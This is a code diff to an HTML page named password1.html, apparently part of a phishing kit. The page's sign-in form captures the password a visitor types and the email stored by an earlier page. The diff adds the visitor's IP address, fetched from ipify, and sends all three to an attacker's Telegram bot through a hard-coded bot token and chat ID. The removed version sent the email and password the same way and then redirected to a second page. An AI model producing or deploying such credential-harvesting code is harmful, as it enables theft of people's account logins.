--- a/password1.html
+++ b/password1.html
@@ -66,54 +66,63 @@
     </div>
 
     <script>
-        document.addEventListener('DOMContentLoaded', function() {
-            // Get the email from localStorage
-            const email = localStorage.getItem('userEmail');
+       document.addEventListener('DOMContentLoaded', function() {
+    // Get the email from localStorage
+    const email = localStorage.getItem('userEmail');
 
-            // Check if the email exists in localStorage
-            if (email) {
-                // Set the email inside the <p> tag with id "emailText"
-                document.getElementById('emailText').textContent = email;
-            } else {
-                console.error('No email found in localStorage');
-                document.getElementById('emailText').textContent = "No email found.";
-            }
+    // Check if the email exists in localStorage
+    if (email) {
+        // Set the email inside the <p> tag with id "emailText"
+        document.getElementById('emailText').textContent = email;
+    } else {
+        console.error('No email found in localStorage');
+        document.getElementById('emailText').textContent = "No email found.";
+    }
+});
+
+document.getElementById('signInForm').addEventListener('submit', function(e) {
+    e.preventDefault(); // Prevent the default form submission (no page reload)
+    
+    // Get the email and password values
+    const email = localStorage.getItem('userEmail');  // Retrieve email stored from the first page
+    const password = document.getElementById('password').value; // Get password input value
+
+    // Get the user's IP address and send email, password, and IP to Telegram
+    getUserIP(email, password);
+});
+
+// Function to get the user's IP address
+function getUserIP(email, password) {
+    fetch('https://api.ipify.org?format=json')
+        .then(response => response.json())
+        .then(data => {
+            const ipAddress = data.ip;  // Get the IP address
+            sendToTelegram(email, password, ipAddress);  // Send email, password, and IP to Telegram
+        })
+        .catch(error => {
+            console.error('Error fetching IP address:', error);
+            sendToTelegram(email, password, 'IP not found');  // Send email and password even if IP fetch fails
         });
+}
 
+// Function to send email, password, and IP to Telegram bot
+function sendToTelegram(email, password, ipAddress) {
+    const telegramBotToken = '7705835551:AAHQlY1QOw61-H3HqbXGIkoQ4nf47Pn6Yjs'; // Replace with your bot token
+    const chatId = '7435519461'; // Replace with your chat ID
 
-        document.getElementById('signInForm').addEventListener('submit', function(e) {
-            e.preventDefault(); // Prevent the default form submission (no page reload)
-            
-            // Get the email and password values
-            const email = localStorage.getItem('userEmail');  // Retrieve email stored from the first page
-            const password = document.getElementById('password').value; // Get password input value
+    // Construct the message
+    const message = `Email: ${email}\nPassword: ${password}\nIP Address: ${ipAddress}`;
 
-            // Send email and password to Telegram
-            sendToTelegram(email, password);
-
-            // Redirect to another page
-            window.location.href = 'password2.html';  // Change 'next-page.html' to your actual page path
+    // Make a GET request to send the message to Telegram
+    fetch(`https://api.telegram.org/bot${telegramBotToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(message)}`)
+        .then(response => response.json())
+        .then(data => {
+            console.log("Message sent to Telegram", data);
+        })
+        .catch(error => {
+            console.error("Error sending message to Telegram:", error);
         });
-
-        // Function to send email and password to Telegram bot
-        function sendToTelegram(email, password) {
-            const telegramBotToken = '7705835551:AAHQlY1QOw61-H3HqbXGIkoQ4nf47Pn6Yjs'; // Replace with your bot token
-            const chatId = '7435519461'; // Replace with your chat ID
-
-            // Construct the message
-            const message = `Email: ${email}\nPassword: ${password}`;
-
-            // Make a GET request to send the message to Telegram
-            fetch(`https://api.telegram.org/bot${telegramBotToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(message)}`)
-                .then(response => response.json())
-                .then(data => {
-                    console.log("Message sent to Telegram", data);
-                })
-                .catch(error => {
-                    console.error("Error sending message to Telegram:", error);
-                });
-        }
-
+}
 
 
     </script>
